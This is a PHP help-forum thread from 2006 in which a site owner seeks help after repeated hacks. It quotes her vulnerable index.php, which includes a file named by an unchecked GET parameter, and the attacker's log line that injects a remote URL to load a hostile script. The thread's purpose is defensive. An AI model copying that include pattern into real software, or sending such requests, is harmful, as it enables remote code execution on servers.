salsa

Thank you!!! Well, it still doesn't serve the second page, but I think that is because it's not serving the ".php" part. I will do some studying and will try to come up with code myself that tests for whether or not .php is included in the variable (and if not, appends it, of course). I would like to add that I didn't mean for my earlier comment to sound snippy (when I reread it, it sounded like it could be), but I was frustrated with trying to read code that wasn't familiar to me. Sure, I could read it in general, but the syntax was not normal. So I would like you to know that I really, really appreciate the help, and especially the link to the help pages. [img src=\"style_emoticons/[#EMO_DIR#]/smile.gif\" style=\"vertical-align:middle\" emoid=\":smile:\" border=\"0\" alt=\"smile.gif\" /] [img src=\"style_emoticons/[#EMO_DIR#]/smile.gif\" style=\"vertical-align:middle\" emoid=\":smile:\" border=\"0\" alt=\"smile.gif\" /] [img src=\"style_emoticons/[#EMO_DIR#]/smile.gif\" style=\"vertical-align:middle\" emoid=\":smile:\" border=\"0\" alt=\"smile.gif\" /]

I think I'm starting to understand. I took a shot at the code below and got this: Parse error: parse error, unexpected '?' in /homepages/25/d146129605/htdocs/index.php on line 34 and assume they're talking about this: if ($zfile) ? include ($zfile) : include('home.php'); What do I do with the ? in the line? Or where do I go to start trying to figure out how to fix it? I assume long-term I'm going to have to learn php, but right now I'm just focused on not getting hacked again :-/ And, by the way, they *don't* by any stretch of the imagination, have the same syntax. I cannot for the life of me figure out what that line, or the line below it, is supposed to do. Call me stupid if you want, but it is *NOT* obvious to someone who is new at it. I was able to get SemiApocalyptic's example to work, but it only serves the home page. There *is* a second page that has to be served, but the when you click on the second page, it shows the correct URL but the middle section is blank. If you click Home, the URL changes appropriately, but hte middle section is again blank. [!--quoteo(post=382013:date=Jun 9 2006, 12:28 PM:name=Crayon Violent)--][div class=\'quotetop\']QUOTE(Crayon Violent @ Jun 9 2006, 12:28 PM) [snapback]382013[/snapback][/div][div class=\'quotemain\'][!--quotec--] foreign code...? js and php have pretty much the same syntax. this really isn't that hard to implement. here's another example of pretty much the same thing that was already mentioned, with the code you provided above: index.php [code] <body> <?php @include('top.php'); ?> <div id="frame"> <div id="leftside"><?php @include('lside.php'); ?></div> <div id="maintext"> <?php //put your files in here. just add more in if you have more than 3 $acceptablefiles = array('home.php','contact.php','register.php'); if ($_GET['z']) {    foreach ($acceptablefiles as $val) {       if ($val == $_GET['z']) {          $zfile = $val;       }    }      if ($zfile) ? include ($zfile) : include('home.php'); } else {    include ('home.php'); } ?> </div> <div id="rightside"><?php @include('rside.php'); ?></div> </div></body></html> [/code] [/quote]

Thanks! This is what is foreign to me: ("/:\/\//", $value)) But overall since there is only one page to be displayed as "home.php" I don't understand why I would need the whole z reference anyway? That's why it's so foreign to me. There is one top, one bottom, one left, one right, one home. They're all referenced in index.php, and the only file for the middle of the page is home.php. There is no z.php, which is why I thought maybe the hacker put that in there. So my question to you all (after I thank you SO much for all the replacement code!!!) is, why do I need this at all? Why not just <?php @include('home.php'); ?> ? Why do I need to go to all the trouble of looking for a page that doesn't exist anyway?

[!--quoteo(post=381985:date=Jun 9 2006, 11:14 AM:name=SemiApocalyptic)--][div class=\'quotetop\']QUOTE(SemiApocalyptic @ Jun 9 2006, 11:14 AM) [snapback]381985[/snapback][/div][div class=\'quotemain\'][!--quotec--] It appears as though the attacker was running a scriptkiddie-esqe panel of tools that allow them to view details about the server and the versions of everything running, view your php.ini file and run phpinfo(), browse around your directories and attempt to alter, delete and upload files to your server. Theres also some fields for attempting to connect and dump the contents of databases. Some IRC things, and theres a bunch of other stuff too. Looks like its tooled up for attacking *NIX based servers by the look at some of the commands that it's attempting to execute. You can prevent stuff like this running within your site by making the alteration I (and kenrbnsn) suggested further up this thread. A JavaScript equivilent will [i]not[/i] work. [/quote] Great! Amazing you can tell that from a couple lines of code. I wasn't looking for a js equivalent, just trying to tell you that I really don't understand what I need to do to fix this. It looks like a foreign language to me. Thanks for looking at it, anyway. Not sure how I'm going to fix it, or maybe just turn it all into straight html.

[!--quoteo(post=381803:date=Jun 9 2006, 04:53 AM:name=kenrbnsn)--][div class=\'quotetop\']QUOTE(kenrbnsn @ Jun 9 2006, 04:53 AM) [snapback]381803[/snapback][/div][div class=\'quotemain\'][!--quotec--] The first check I do in almost all of my scripts is to check any incoming parameters for known exploits... "content-type" in forms that generate email, "://" in any parameters where I'm not expecting that string. If I find them, I email the $_SERVER, $_POST, and $_GET arrays to myself and then use the header() function to issue a 404 error message. If the address where the attempt was done from is identifiable, I send a warning email to the abuse address at that site. For more information explore the [a href=\"http://phpsec.org/\" target=\"_blank\"]PHP Security Consortium[/a] web site. Ken [/quote] Is there any possibility you can write that out for someone who knows html & javascript? I'm sure there's great info in your words, I just don't understand them. Thanks!

[!--quoteo(post=381743:date=Jun 8 2006, 10:04 PM:name=hvle)--][div class=\'quotetop\']QUOTE(hvle @ Jun 8 2006, 10:04 PM) [snapback]381743[/snapback][/div][div class=\'quotemain\'][!--quotec--] how can we help you with a "index.php?z=http://someone's site" [/quote] Sorry, I tried to post the entire line they used, but the forum wouldn't let me do it. Here is the code that is currently in my index.php. Is it possible that the hacker changed the page to have all the z stuff? I don't remember it being there before, I only remember the stuff that was @include('home.php'), etc. <body> <?php @include('top.php'); ?> <div id="frame"> <div id="leftside"><?php @include('lside.php'); ?></div> <div id="maintext"> <?php $z=$_GET['z']; if(!isset($z)) { @include('home.php'); } else { @include($z.'.php'); } ?> </div> <div id="rightside"><?php @include('rside.php'); ?></div> </div></body></html> I think the idea was originally that php would be used to serve the different sides of the page like includes. Do I need all the z stuff? How can I change this so it's not hackable? Ugggh, php looks like a foreign language to me. This is what they used to exploit: (I don't know if it'll post properly but trying again). "POST /index.php?z=http://ciberia.ya.com/jest3r/sep3.php? HTTP/1.0"

Hi all! Please excuse me, I'm new, but desperate at the moment. It appears that someone is repeatedly hacking my site, and my host is blaming *me*. Or at least my "scripts." Except that there aren't any scripts on my site at all! But I think someone is using a vulnerability of PHP to hack my site. Anyway, the php in the site is only for organization. There is really nothing to it. It serves up pages, keeps things in order. I've been through every page and can't find a thing wrong. Below are the lines that my host is accusing as hacks. None of it is actually accessing files on my site, or at least I can't find any foreign files on my site. The common theme is index.php?z=http://someone's site. Please help! I'm desperate!!!